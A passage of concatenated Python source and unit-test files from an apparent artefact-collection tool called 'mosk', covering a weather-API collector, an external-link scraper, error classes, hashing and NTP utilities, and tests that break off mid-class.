from logging import Logger
from urllib.request import urlopen
from urllib.error import HTTPError
from urllib.error import URLError
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from collections import UserDict
from baseclasses.artefact import ArtefactBase
from businesslogic.errors import ApiKeyFormatError, ApiKeyNotSetError
class TemperatureFromOpenWeatherDotCom(ArtefactBase):
"""
Retrieves the current temperature from OpenWeather.com.
You need to provide the citiy, country code, and a valid API key, which you can get from
OpenWeather.com.
"""
def __init__(self, *args, **kwargs) -> None:
self._apikey: str = ""
super().__init__(*args, **kwargs)
self.__url: str = "https://api.openweathermap.org/data/2.5/weather"
self.__querytemplate: str = "{}?q={},{}&units=Metric&&APPID={}"
def _collect(self) -> None:
try:
queryurl = self._get_query()
except AttributeError as attr_err:
self.data = f"Could not load query. Error: '{str(attr_err)}'."
else:
try:
weather_data = urlopen(queryurl)
except HTTPError as httperror:
self.data = f"Could not query {queryurl}.\n{httperror.info}"
except URLError as urlerr:
self.data = f"Could not query {queryurl}.\n{str(urlerr)}"
else:
if self._weather_data_is_valid(weather_data):
data = json.load(weather_data)
self.data = f"Current temperature in {self.city}: {data['main']['temp']} °C"
else:
self.data = f"'{queryurl}' returned invalid weather data."
# REMARKS: Revisit this method. Only checking for the status code is no real help, I think.
@staticmethod
def _weather_data_is_valid(weather_data: http.client.HTTPResponse) -> bool:
logger: Logger = logging.getLogger(__name__)
if weather_data.getcode() == 200:
return True
else:
logger.warning(f"HTTPResponse code for queryied weather data was '{weather_data.getcode()}'. "
f"Status code 200 is a requirement.")
return False
def _get_query(self) -> str:
return self.__querytemplate.format(self.__url, self.city, self.countrycode, self.apikey)
def _get_parameters_for_str(self) -> UserDict:
"""Overwrite default to prevent logging of API key."""
filtered: UserDict = {}
for itemname, itemvalue in self._parameters.items():
if itemname != 'apikey':
filtered[itemname] = itemvalue
return filtered
@property
def apikey(self) -> str:
if self._apikey == "":
raise ApiKeyNotSetError("apikey not set.")
else:
return self._apikey
@apikey.setter
def apikey(self, value: str) -> None:
if self._validate_api_key(value):
self._apikey = value
else:
raise ApiKeyFormatError(f"Provided api key '{value}' does not match the valid format.")
@staticmethod
def _validate_api_key(apikey) -> bool:
valid_apikey_expression = re.compile('^[a-z0-9]{32}$')
return valid_apikey_expression.match(apikey)
class ExternalLinksOnUrl(ArtefactBase):
"""
Retrieves all the external links from a provided URL, using BeautifulSoup.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __str__(self) -> str:
result: str = ''
if type(self.data[0].collecteddata) is list:
for item in self.data[0].collecteddata:
result += f"{item}\r\n"
else:
result += self.data[0].collecteddata
result += self.data[0].get_metadata_as_str()
return result
def _collect(self) -> None:
self.data = ExternalLinksOnUrl._getexternallinks(self.url)
@staticmethod
def _getexternallinks(excludeurl: str) -> list:
try:
html = urlopen(excludeurl)
except URLError as urlerror:
return f"Cannot open url '{excludeurl}'.\n{urlerror.reason}"
except HTTPError as httperror:
return f"Cannot request page '{excludeurl}\n{httperror.reason}'"
else:
bs = BeautifulSoup(html, "html.parser")
parsed_url = urlparse(excludeurl)
tmp = f"^(http|https)://((?!'+{parsed_url.netloc}+').)*$"
externallinks = [link['href'] for link in bs.find_all('a', href=re.compile(tmp))
if link['href'] is not None]
return externallinks
```
#### File: mosk/businesslogic/errors.py
```python
__author__ = '3Peso'
__all__ = ['MaxDirectoriesReachedError', 'UnknownVersionStringError', 'ApiKeyNotSetError', 'ApiKeyFormatError',
'PathNotSetError', 'NoCollectorError', 'MD5SupportError', 'NoCountryCodeError', 'NoStringResourcesError',
'LogFileMaximumReachedError', 'CollectorParameterError', 'GlobalPlaceholderFileError',
'SignatureMatchError', 'TreePathError']
class MaxDirectoriesReachedError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class UnknownVersionStringError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class ApiKeyNotSetError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class ApiKeyFormatError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class PathNotSetError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class NoCollectorError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class MD5SupportError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class NoStringResourcesError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class NoCountryCodeError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class LogFileMaximumReachedError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class CollectorParameterError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class GlobalPlaceholderFileError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class ImageFileError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class SignatureMatchError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class TreePathError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
```
#### File: mosk/businesslogic/support.py
```python
__author__ = '3Peso'
__all__ = ['get_userfolders', 'md5', 'run_terminal_command', 'str_to_bool', 'format_bytes',
'validate_file_signature']
import json
import locale
import logging
import os
import socket
import sys
import time
import struct
import hashlib
import subprocess
from logging import Logger
import chardet
from businesslogic.errors import MD5SupportError, NoStringResourcesError, NoCountryCodeError
REF_TIME_1970 = 2208988800 # Reference time
DEFAULT_TIME_SERVER = '0.de.pool.ntp.org'
def get_userfolders():
"""
Generator which returns all user folders of the localhost.
ONLY WORKS ON MAC
"""
for f in os.scandir('/Users'):
if f.is_dir():
yield f
# from : https://stackoverflow.com/questions/36500197/python-get-time-from-ntp-server
def get_time(ntpserver: str = DEFAULT_TIME_SERVER):
"""
Retrieves the current time from an NTP server.
:param ntpserver: NTP Server to use. Default is 0.de.pool.ntp.org.
:return: The current time.
"""
client: socket.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
data = b'\x1b' + 47 * b'\0'
socket_error = None
t = None
try:
client.sendto(data, (ntpserver, 123))
data, address = client.recvfrom(1024)
if data:
t = struct.unpack('!12I', data)[10]
t -= REF_TIME_1970
except socket.gaierror as so_err:
socket_error = so_err
finally:
if client is not None:
client.close()
if socket_error is not None:
raise socket_error
return time.ctime(t)
def str_to_bool(boolstring: str):
"""
Translate a string into a real boolean value.
:param boolstring:
Any string. But original intention was the usage of the strings "False" and "True".
:return:
Returns True for the string "True" and False for the string "False".
Returns True for any nonempty string and False for an empty string or for None.
"""
if isinstance(boolstring, str) or boolstring is None:
if boolstring == 'True':
return True
if boolstring == 'False':
return False
elif boolstring == '' or boolstring is None:
return False
else:
return True
else:
raise TypeError('Only strings and None are supported.')
# From https://stackoverflow.com/questions/3431825/generating-an-md5-checksum-of-a-file
def md5(fpath: str = "", data: str = ""):
"""
Calculates the the MD5 hash of a file.
You can only provide a file path OR a data string, not both.
:param fpath: Path of the file for which the MD5 hash is required.
:param data: Data string for which the MD5 hash should be calculated.
:return: Returns the string representation of the MD5 hash.
"""
if fpath is not None and fpath != "" and data is not None and data != "":
raise MD5SupportError("You can only provide a file OR a data string to calculate the MD5 hash.")
logger: Logger = logging.getLogger(__name__)
hash_md5 = hashlib.md5()
if fpath is not None and fpath != "":
logger.debug(f"Calculating MD5 hash for '{fpath}'.")
with open(fpath, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
elif data is not None and data != "":
logger.debug(f"Calculating MD5 hash for string '{data}'.")
bvalue = data.encode('ascii')
chunks = _chunkstring(bvalue, 4096)
for chunk in chunks:
hash_md5.update(chunk)
return hash_md5.hexdigest()
def _chunkstring(string: str, length: int):
return (string[0 + i:length + i] for i in range(0, len(string), length))
def get_collector_resources(resourcespath: str = "./resources"):
countrycode, _ = locale.getdefaultlocale()
resources = None
resourcesfilepath = _get_resources_path(resourcespath, countrycode)
resources = _load_resources(resourcesfilepath, countrycode)
if resources is None:
resourcesfilepath = _get_resources_path(resourcespath, 'None')
resources = _load_resources(resourcesfilepath, countrycode)
return resources
class ChangeToModuleRoot:
def __init__(self):
self._original_working_dir = os.getcwd()
def __enter__(self):
self._change_cwd_to_module_root()
def __exit__(self, exc_type, exc_value, exc_traceback):
os.chdir(self._original_working_dir)
@staticmethod
def _change_cwd_to_module_root():
basepath: str = os.path.dirname(sys.modules[__name__].__file__)
os.chdir(basepath)
os.chdir('..')
def _get_resources_path(resourcespath: str, countrycode: str):
logger: Logger = logging.getLogger(__name__)
if resourcespath == '':
raise NoStringResourcesError('Resources path is empty.')
if countrycode == '':
raise NoCountryCodeError('Country code is empty.')
resourcesfilepath = os.path.join(resourcespath, f"collector_text_{countrycode}.json")
logger.debug("Trying to load text resources from '{} ...'".format(resourcesfilepath))
# Do the following steps to ensure we are operating in the root directory of mosk
# so that os.abspath works
# Depends on support module stored one level above root
with ChangeToModuleRoot():
resourcesfilepath = os.path.abspath(resourcesfilepath)
return resourcesfilepath
def _load_resources(resourcesfilepath: str, countrycode: str):
if resourcesfilepath == '':
raise NoStringResourcesError('Resourcefilepath is empty.')
logger = logging.getLogger(__name__)
resources = None
if os.path.exists(resourcesfilepath):
try:
with open(resourcesfilepath) as rf:
resources = json.load(rf)
except json.decoder.JSONDecodeError as json_error:
if json_error.msg == "Expecting value":
logger.info(f'Resource file for country code {countrycode} is empty.')
except FileNotFoundError:
if countrycode is None:
logger.warning('Default resources file not found.')
else:
logger.info(f'Resources file for country code {countrycode} not found.')
return resources
def run_terminal_command(arguments: list):
process = subprocess.Popen(arguments,
stdout=subprocess.PIPE,
universal_newlines=True)
return process.communicate()[0]
def format_bytes(size: int):
"""
Calculate more human readable values for byte sizes
:param size: Will support sizes up to terra bytes. Afterwards all is returned as terra bytes.
:return: string <calculatedsize><unit> for example "1MB"
"""
power = 1024
n = 0
max_unit = 4
power_labels = {0: '', 1: 'K', 2: 'M', 3: 'G', 4: 'T'}
while size >= power and n < max_unit:
size /= power
n += 1
return f"{round(size,2)}{power_labels[n]+'B'}"
def validate_file_signature(filepath: str) -> bool:
"""
Takes a file path, calculates its MD5 hash and compares this hash to the provided hash
the file should have.
Expects that in the folder of the file to check also is a file called <file>.md5 which contains
the expected hash.
:param filepath:
:return: Returns True if the hash of the file is the same as the implicitely provided hash.
"""
file_, file_ext = os.path.splitext(filepath)
signature_file:str = f"{file_}.md5"
if not os.path.exists(signature_file):
return False
# MD5 hashes are 128 bit long. Just roughly check for the size 32,
# for UTF8, for typical Windows encoding of textfiles,
# or 16 ASCII encoding.
if os.stat(signature_file).st_size != 32 and os.stat(signature_file).st_size != 16:
return False
with open(signature_file) as sig_file:
signature = sig_file.read()
if md5(filepath) != signature:
return False
return True
```
#### File: mosk/source/localhost.py
```python
__author__ = '3Peso'
__all__ = ['LocalHost', 'expandfilepath']
import logging
from baseclasses.source import SourceBase
from os import path
from pathlib import Path
class LocalHost(SourceBase):
def __init__(self, *args, **kwargs):
SourceBase.__init__(self, *args, **kwargs)
def expandfilepath(filepath: str):
if '~' not in filepath:
return filepath
homepath: str = str(Path.home())
filepath = filepath.split('~')[-1]
if filepath.startswith('/'):
filepath: str = filepath[1:]
filepath = path.join(homepath, filepath)
logger = logging.getLogger(__name__)
logger.debug("Path '{}' expanded.".format(filepath))
return filepath
```
#### File: mosk/tests/test_artefact.py
```python
import logging
import platform
from unittest import TestCase, mock
from unittest.mock import MagicMock, patch
class TestArtefactBaseDataSetter(TestCase):
@mock.patch('businesslogic.placeholders.Placeholder._initialize_global_placeholders', MagicMock())
def test_data_setter(self):
"""
Should add the provided value as data object to its data object list
:return:
"""
from baseclasses.artefact import ArtefactBase
artefact = ArtefactBase(parent=None, parameters={})
artefact.data = "Some data"
self.assertEqual(len(artefact.data), 1)
@mock.patch('businesslogic.placeholders.Placeholder._initialize_global_placeholders', MagicMock())
def test_data_setter_with_two_objects(self):
"""
Should append data to the data object array if there are more data objects to be collected
:return:
"""
from baseclasses.artefact import ArtefactBase
artefact = ArtefactBase(parent=None, parameters={})
artefact.data = "Some data"
artefact.data = "More data"
self.assertEqual(len(artefact.data), 2)
@mock.patch('businesslogic.placeholders.Placeholder._initialize_global_placeholders', MagicMock())
def test_data_setter_overwrite(self):
"""
Should overwrite existing collected data if None is provided as data object
:return:
"""
from baseclasses.artefact import ArtefactBase
artefact = ArtefactBase(parent=None, parameters={})
artefact.data = "Some data"
artefact.data = "More data"
artefact.data = None
self.assertEqual(len(artefact.data), 0)
class TestArtefactBaseInitDescription(TestCase):
@mock.patch('businesslogic.placeholders.Placeholder._initialize_global_placeholders', MagicMock())
def test__init_description_properties_with_missing_resources(self):
"""
Should initialize properties _title, _description, and _collectionmethod with None
"""
from baseclasses.artefact import ArtefactBase
artefact = ArtefactBase(parent=None, parameters={})
self.assertIsNone(artefact._title)
self.assertIsNone(artefact._description)
self.assertIsNone(artefact._collectionmethod)
@mock.patch('businesslogic.placeholders.Placeholder._initialize_global_placeholders', MagicMock())
def test__init_description_properties_with_missing_resources_for_collector(self):
"""
Should initialize properties _title, _description, and _collectionmethod with None,
if there are no string for the current collector
"""
from baseclasses.artefact import ArtefactBase
artefact = ArtefactBase(parent=None, parameters={})
self.assertIsNone(artefact._title)
self.assertIsNone(artefact._description)
self.assertIsNone(artefact._collectionmethod)
@mock.patch('businesslogic.placeholders.Placeholder._initialize_global_placeholders', MagicMock())
def test__init_description_properties(self):
"""
Should initialize properties _title, _description, and _collectionmethod
"""
from tests.support.mockups import SimpleArtefactMockup
artefact = SimpleArtefactMockup(parent=None, parameters={})
self.assertEqual(artefact._title, 'SimpleArtefactMockup')
self.assertEqual(artefact._description, 'This is a mockup collector.')
self.assertEqual(artefact._collectionmethod, 'mockup')
class TestArtefactBaseCacheParameters(TestCase):
def test_cache_parameters_not_defined(self):
"""
Should add the new placeholder to the global placeholders dictionary of Placeholders.
"""
from baseclasses.artefact import ArtefactBase
from businesslogic.placeholders import Placeholder
artefact = ArtefactBase(parent=None, parameters={})
expected_value = "value"
expected_attribute = "attribute"
artefact.cache_parameters({expected_attribute: expected_value})
try:
actual_value = Placeholder._instruction_placeholders[expected_attribute]
self.assertEqual(expected_value, actual_value)
except Exception:
self.fail()
def test_cache_parameters_already_defined(self):
"""
Should overwrite the placeholder in the global placeholders dictionary of Placeholders.
"""
from baseclasses.artefact import ArtefactBase
from businesslogic.placeholders import Placeholder
artefact = ArtefactBase(parent=None, parameters={})
expected_value = "value"
expected_attribute = "attribute"
Placeholder._instruction_placeholders[expected_attribute] = expected_value
expected_new_value = "new value"
artefact.cache_parameters({expected_attribute: expected_new_value})
try:
actual_value = Placeholder._instruction_placeholders[expected_attribute]
self.assertEqual(expected_new_value, actual_value)
except Exception:
self.fail()
class TestArtefactBaseDunderCall(TestCase):
def test___call__with_unhandled_exception(self):
"""
Should log a meaningfull error message in collected data.
:return:
"""
from tests.support.mockups import ExceptionArtefactMockup
expected_message = "Caught unhandled exception during collection of artefact. " \
"Exception: There is something wrong with your values."
actual_artefact = ExceptionArtefactMockup(parent=None, parameters={})
actual_artefact._supportedplatform = []
try:
logging.disable(logging.ERROR)
# Collect by using __call__
actual_artefact()
finally:
logging.disable(logging.NOTSET)
actual_message = actual_artefact.data[0].collecteddata
self.assertEqual(actual_message, expected_message)
def test___call__with_unsupported_platform(self):
"""
Should log, that the selected collector is not supported by the underlying plattform.
:return:
"""
from tests.support.mockups import ExceptionArtefactMockup
expected_message = 'The platform "{}" is not supported by this collector. ' \
'\r\nPlatform supported: "[\'MamboJamboPlatform\']"'.format(platform.system())
actual_artefact = ExceptionArtefactMockup(parent=None, parameters={})
# Collect by using __call__
actual_artefact()
actual_message = actual_artefact.data[0].collecteddata
self.assertEqual(actual_message, expected_message)
def test___call__with_unsupported_platform_version(self):
"""
Should log in data, that the platform verion is not supported
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_min_version = "1.0.0.0"
expected_max_version = "2.0.0.0"
expected_platform_version = "0.9.0.0"
expected_message = 'The platform "{}" with its version "{}" is not supported by this collector. ' \
'\r\nMinimal version supported: "{}". Max version supported: "{}"' \
.format(platform.system(), expected_platform_version, expected_min_version, expected_max_version)
actual_artefact = SimpleArtefactMockup(parent=None, parameters={})
actual_artefact._platform_version = expected_platform_version
actual_artefact._min_platform_version = expected_min_version
actual_artefact._max_platform_version = expected_max_version
# Collect by using __call__
with mock.patch('baseclasses.artefact.ArtefactBase.is_platform_version_supported',
MagicMock(return_value=False)):
actual_artefact()
actual_message = actual_artefact.data[0].collecteddata
self.assertEqual(actual_message, expected_message)
class TestArtefactBaseDunderStr(TestCase):
def test___str__data_is_none(self):
"""
Should return empty string.
:return:
"""
from tests.support.mockups import ExceptionArtefactMockup
expected_string = ''
actual_artefact = ExceptionArtefactMockup(parent=None, parameters={})
actual_artefact_as_string = str(actual_artefact)
self.assertEqual(expected_string, actual_artefact_as_string)
class TestArtefactBaseGetDocumentation(TestCase):
def test_getdocumentation(self):
"""
Should return string with the documentation information for that collector.
:return:
"""
from tests.support.mockups import ExceptionArtefactMockup
expected_documentation = 'Title: Title\nDescription: Description\nCollection Method: Method'
actual_artefact = ExceptionArtefactMockup(parent=None, parameters={})
actual_artefact._title = "Title"
actual_artefact._description = "Description"
actual_artefact._collectionmethod = "Method"
actual_documentation = actual_artefact.getdocumentation()
self.assertEqual(actual_documentation, expected_documentation)
class TestArtefactBaseInitDescriptionProperties(TestCase):
def test__init_description_properties(self):
"""
Should initialize _title, _description, _collectionmethod, looking these infos up in the resources file
which is currently in use.
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_resources = {
'tests.support.mockups.SimpleArtefactMockup': {
'title': 'Test Title',
'description': 'Test Description',
'collectionmethod': 'Method'
}
}
with mock.patch('baseclasses.artefact.get_collector_resources',
MagicMock(return_value=expected_resources)):
actual_artefact = SimpleArtefactMockup(parameters={}, parent={})
actual_artefact._init_description_properties()
self.assertEqual(expected_resources['tests.support.mockups.SimpleArtefactMockup']['title'],
actual_artefact._title)
self.assertEqual(expected_resources['tests.support.mockups.SimpleArtefactMockup']['description'],
actual_artefact._description)
self.assertEqual(expected_resources['tests.support.mockups.SimpleArtefactMockup']['collectionmethod'],
actual_artefact._collectionmethod)
def test__init_description_properties_no_title_found(self):
"""
Should init _title with "No title found".
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_resources = {
'tests.support.mockups.SimpleArtefactMockup': {
'description': 'Test Description',
'collectionmethod': 'Method'
}
}
with mock.patch('baseclasses.artefact.get_collector_resources',
MagicMock(return_value=expected_resources)):
actual_artefact = SimpleArtefactMockup(parameters={}, parent={})
actual_artefact._init_description_properties()
self.assertEqual("No Title Found", actual_artefact._title)
def test__init_description_properties_no_description_found(self):
"""
Should init _description with "No description found".
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_resources = {
'tests.support.mockups.SimpleArtefactMockup': {
'title': 'Title',
'collectionmethod': 'Method'
}
}
with mock.patch('baseclasses.artefact.get_collector_resources',
MagicMock(return_value=expected_resources)):
actual_artefact = SimpleArtefactMockup(parameters={}, parent={})
actual_artefact._init_description_properties()
self.assertEqual("No Description Found", actual_artefact._description)
def test__init_description_properties_no_colletionmethod_found(self):
"""
Should init _collectionmethod with "No collection method found".
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_resources = {
'tests.support.mockups.SimpleArtefactMockup': {
'title': 'Title',
'description': 'Description'
}
}
with mock.patch('baseclasses.artefact.get_collector_resources',
MagicMock(return_value=expected_resources)):
actual_artefact = SimpleArtefactMockup(parameters={}, parent={})
actual_artefact._init_description_properties()
self.assertEqual("No Collection Method Found", actual_artefact._collectionmethod)
class TestArtefactBaseSupportedPlatform(TestCase):
def test_supported_platform_set_multiple_platforms(self):
"""
Should add all platforms to the member list _supportedplatform
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_platforms = "['Platform1', 'Platform2', 'Platform3']"
collector = SimpleArtefactMockup(parameters={}, parent=None)
collector.supported_platform = "Platform1"
collector.supported_platform = "Platform2"
collector.supported_platform = "Platform3"
self.assertEqual(expected_platforms, str(collector._supportedplatform))
def test_supported_platform_set_same_platform_twice(self):
"""
Should add a supported platform just once.
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_platforms = "['Platform1', 'Platform2']"
collector = SimpleArtefactMockup(parameters={}, parent=None)
collector.supported_platform = "Platform1"
collector.supported_platform = "Platform2"
collector.supported_platform = "Platform2"
self.assertEqual(expected_platforms, str(collector._supportedplatform))
def test_supported_platform_getter(self):
"""
Should return the memberlist _supportedplatform
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_platforms = "['Platform1', 'Platform2', 'Platform3']"
collector = SimpleArtefactMockup(parameters={}, parent=None)
collector.supported_platform = "Platform1"
collector.supported_platform = "Platform2"
collector.supported_platform = "Platform3"
actual_platforms = collector.supported_platform
self.assertEqual(expected_platforms, str(actual_platforms))
class TestArtefactBase(TestCase):
def test_is_platform_supported_with_multiple_supported_platforms(self):
"""
Should return true
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_support = True
collector = SimpleArtefactMockup(parameters={}, parent=None)
collector.supported_platform = "Platform1"
collector.supported_platform = "Platform2"
collector.supported_platform = "Platform3"
with mock.patch('baseclasses.artefact.platform.system', MagicMock(return_value='Platform1')):
actual_support = collector.is_platform_supported()
self.assertEqual(expected_support, actual_support)
class TestFileClassFilePathProperty(TestCase):
def test_filepath_setter_with_trailing_whitespace_chars(self):
"""
Should remove whitespace chars like '\r' and '\n'
:return:
"""
from baseclasses.artefact import FileClass
expected_file_path = "./somepath"
fileobj = FileClass()
fileobj.source_path = './somepath\r\n'
actual_file_path = fileobj.source_path
self.assertEqual(expected_file_path, actual_file_path)
def test_filepath_setter_with_home_abbreviation(self):
"""
Should expand the file path.
:return:
"""
from baseclasses.artefact import FileClass
expected_file_path = "/home/testuser/somepath"
fileobj = FileClass()
with mock.patch('baseclasses.artefact.expandfilepath', MagicMock(return_value=expected_file_path)):
fileobj.source_path = '~/somepath'
actual_file_path = fileobj.source_path
self.assertEqual(expected_file_path, actual_file_path)
def test_failpath_setter(self):
"""
Should set the value of _filepath
:return:
"""
from baseclasses.artefact import FileClass
expected_file_path = "./somepath"
fileobj = FileClass()
fileobj.source_path = './somepath'
actual_file_path = fileobj._source_path
self.assertEqual(expected_file_path, actual_file_path)
def test_filepath_getter(self):
"""
Should return the value of _filepath
:return:
"""
from baseclasses.artefact import FileClass
expected_file_path = "./somepath"
fileobj = FileClass()
fileobj._source_path = './somepath'
actual_file_path = fileobj.source_path
self.assertEqual(expected_file_path, actual_file_path)
class TestToolClassToolPathGetter(TestCase):
def test_tool_path_with_empty__tool_path(self):
"""
Should return 'plutil' indicating that the live plutil is used.
:return:
"""
from baseclasses.artefact import ToolClass
expected_tool_path = "plutil"
tool = ToolClass()
tool._default_tool = "plutil"
actual_tool_path = tool.tool_path
self.assertEqual(expected_tool_path, actual_tool_path)
class TestToolClassToolPathSetter(TestCase):
@patch('artefact.localhost.tools.path.exists', MagicMock(return_value=True))
def test_tool_path_existing_path(self):
"""
Should return tool path.
"""
from baseclasses.artefact import ToolClass
tool = ToolClass()
tool._default_tool = "plutil"
with patch('baseclasses.artefact.validate_file_signature', MagicMock(return_value=True)):
expected_tool_path = "some_tool_path"
tool.tool_path = expected_tool_path
actual_tool_path = tool._tool_path
self.assertEqual(expected_tool_path, actual_tool_path)
def test_tool_path_is_empty(self):
"""
Should set _tool_path to empty string.
:return:
"""
from baseclasses.artefact import ToolClass
expected_tool_path = ""
tool = ToolClass()
tool._default_path = "plutil"
tool.tool_path = ""
actual_tool_path = tool._tool_path
self.assertEqual(expected_tool_path, actual_tool_path)
@patch('artefact.localhost.tools.path.exists', MagicMock(return_value=True))
def test_tool_path_exisiting_path_but_wrong_signature(self):
"""
Should throw an exception.
:return:
"""
from baseclasses.artefact import ToolClass
from businesslogic.errors import SignatureMatchError
tool = ToolClass()
tool._default_tool = "plutil"
with patch('baseclasses.artefact.validate_file_signature', MagicMock(return_value=False)):
expected_util_path = 'some_tool_path'
with self.assertRaises(SignatureMatchError):
tool.tool_path = expected_util_path
def test_tool_path_does_not_exist(self):
"""
Should not set the attribute _tool_path
:return:
"""
from baseclasses.artefact import ToolClass
expected_tool_path = ""
tool = ToolClass()
tool._default_path = "plutil"
tool.tool_path = "IDoNotExist"
actual_tool_path = tool._tool_path
self.assertEqual(expected_tool_path, actual_tool_path)
```
#### File: mosk/tests/test_collector_network_internet.py
```python
import logging
import platform
from unittest import TestCase, mock
from unittest.mock import MagicMock
from artefact.network.internet import TemperatureFromOpenWeatherDotCom
class TestTemperatureFromOpenWeatherDotComDunderInit(TestCase):
def test___init__(self):
"""
Should initialize self.__url and self.__querytemplate.
:return:
"""
expected_querytemplate = "{}?q={},{}&units=Metric&&APPID={}"
expected_url = "https://api.openweathermap.org/data/2.5/weather"
collector = TemperatureFromOpenWeatherDotCom(parameters={}, parent=None)
self.assertEqual(expected_url, collector._TemperatureFromOpenWeatherDotCom__url)
self.assertEqual(expected_querytemplate, collector._TemperatureFromOpenWeatherDotCom__querytemplate)
class TestTemperatureFromOpenWeatherDotComCollect(TestCase):
@mock.patch('artefact.network.internet.TemperatureFromOpenWeatherDotCom._get_query',
MagicMock(return_value='http://plumbumm.ich.bin.nicht.da.haha'))
def test__collect_openweathermap_not_reachable(self):
"""
Should log unreachability in the "collected" data as string.
:return:
"""
excpeted_data = "Could not query http://plumbumm.ich.bin.nicht.da.haha." \
"\n<urlopen error [Errno 8] nodename nor servname provided, or not known>"
if platform.system() == "Windows":
excpeted_data = "Could not query http://plumbumm.ich.bin.nicht.da.haha." \
"\n<urlopen error [Errno 11001] getaddrinfo failed>"
collector = TemperatureFromOpenWeatherDotCom(parameters={
'countrycode': 'ger', 'apikey': '<KEY>', 'city': 'Munich'}, parent=None)
collector._collect()
self.assertEqual(excpeted_data, collector.data[0].collecteddata)
@mock.patch('artefact.network.internet.urlopen',
MagicMock(return_value='I am invalid'))
@mock.patch('artefact.network.internet.TemperatureFromOpenWeatherDotCom._weather_data_is_valid',
MagicMock(return_value=False))
def test__collect_openweathermap_returns_invalid_json(self):
"""
Should log invalid state of json in "collected" data as string.
:return:
"""
excpeted_data = \
"'https://api.openweathermap.org/data/2.5/weather?q=Munich,ger" \
"&units=Metric&&APPID=123456789abcdefghijkl1234567890a' " \
"returned invalid weather data."
collector = TemperatureFromOpenWeatherDotCom(parameters={
'countrycode': 'ger', 'apikey': '<KEY>', 'city': 'Munich'}, parent=None)
collector._apikey = '<KEY>'
collector._collect()
self.assertEqual(excpeted_data, collector.data[0].collecteddata)
def test__collect_missing_query_parameter(self):
"""
Should log the missing parameter(s) in data.
:return:
"""
excpeted_data = "Could not load query. " \
"Error: ''TemperatureFromOpenWeatherDotCom' object has no attribute 'city''."
collector = TemperatureFromOpenWeatherDotCom(parameters={
'countrycode': 'ger', 'apikey': '<KEY>'}, parent=None)
collector._collect()
self.assertEqual(excpeted_data, collector.data[0].collecteddata)
class TestTemperatureFromOpenWeatherDotComGetParametersForStr(TestCase):
def test__get_parameters_for_str(self):
"""
Should get all parameters necessary and store them for logging except the API key.
:return:
"""
collector = TemperatureFromOpenWeatherDotCom(parameters={'city': 'Munich',
'countrycode': 'ger', 'apikey': '<KEY>'}, parent=None)
actual_parameters = collector._get_parameters_for_str()
self.assertFalse('apikey' in actual_parameters)
class TestTemperatureFromOpenWeatherDotComGetQuery(TestCase):
def test__get_query(self):
"""
Should return the initialized query string used to query the weather from openweather.com
:return:
"""
expected_query = "https://api.openweathermap.org/data/2.5/weather?q=Munich,ger&units=Metric&&APPID=123456789abcdefghijkl1234567890a"
collector = TemperatureFromOpenWeatherDotCom(parameters={
'city': 'Munich', 'countrycode': 'ger', 'apikey': '<KEY>'}, parent=None)
collector._apikey = '<KEY>'
actual_query = collector._get_query()
self.assertEqual(expected_query, actual_query)
def test__get_query_missing_city(self):
"""
Should raise an exception.
:return:
"""
collector = TemperatureFromOpenWeatherDotCom(parameters={'countrycode': 'ger', 'apikey':
'<KEY>'},
parent=None)
self.assertRaises(AttributeError, collector._get_query)
def test__get_query_missing_countrycode(self):
"""
Should raise an exception.
:return:
"""
collector = TemperatureFromOpenWeatherDotCom(parameters={'city': 'Munich', 'apikey':
'<KEY>'},
parent=None)
self.assertRaises(AttributeError, collector._get_query)
def test__get_query_missing_apikey(self):
"""
Should raise an exception.
:return:
"""
from businesslogic.errors import ApiKeyNotSetError
collector = TemperatureFromOpenWeatherDotCom(parameters={'city': 'Munich', 'countrycode': 'ger'},
parent=None)
self.assertRaises(ApiKeyNotSetError, collector._get_query)
class TestTemperatureFromOpenWeatherDotComWeatherDataIsValid(TestCase):
def test__weather_data_is_valid(self):
"""
Should return True
:return:
"""
collector = TemperatureFromOpenWeatherDotCom(parameters={
'countrycode': 'ger', 'apikey': '<KEY>', 'city': 'Munich'}, parent=None)
class FunkyHTTPResponseMockup():
@staticmethod
def getcode():
return 200
actual_data = FunkyHTTPResponseMockup()
actual_result = collector._weather_data_is_valid(actual_data)
self.assertTrue(actual_result)
def test__weahter_data_is_valid_data_is_invalid(self):
"""
Should return False
:return:
"""
collector = TemperatureFromOpenWeatherDotCom(parameters={
'countrycode': 'ger', 'apikey': '<KEY>', 'city': 'Munich'}, parent=None)
class FunkyHTTPResponseMockup():
@staticmethod
def getcode():
return 401
actual_data = FunkyHTTPResponseMockup()
try:
logging.disable(logging.ERROR)
actual_result = collector._weather_data_is_valid(actual_data)
finally:
logging.disable(logging.NOTSET)
self.assertFalse(actual_result)
class TestTemperatureFromOpenWeatherDotComApiKey(TestCase):
def test_apikey_getter_not_initialized(self):
"""
Should raise an exception.
:return:
"""
from businesslogic.errors import ApiKeyNotSetError
collector = TemperatureFromOpenWeatherDotCom(parent=None, parameters={})
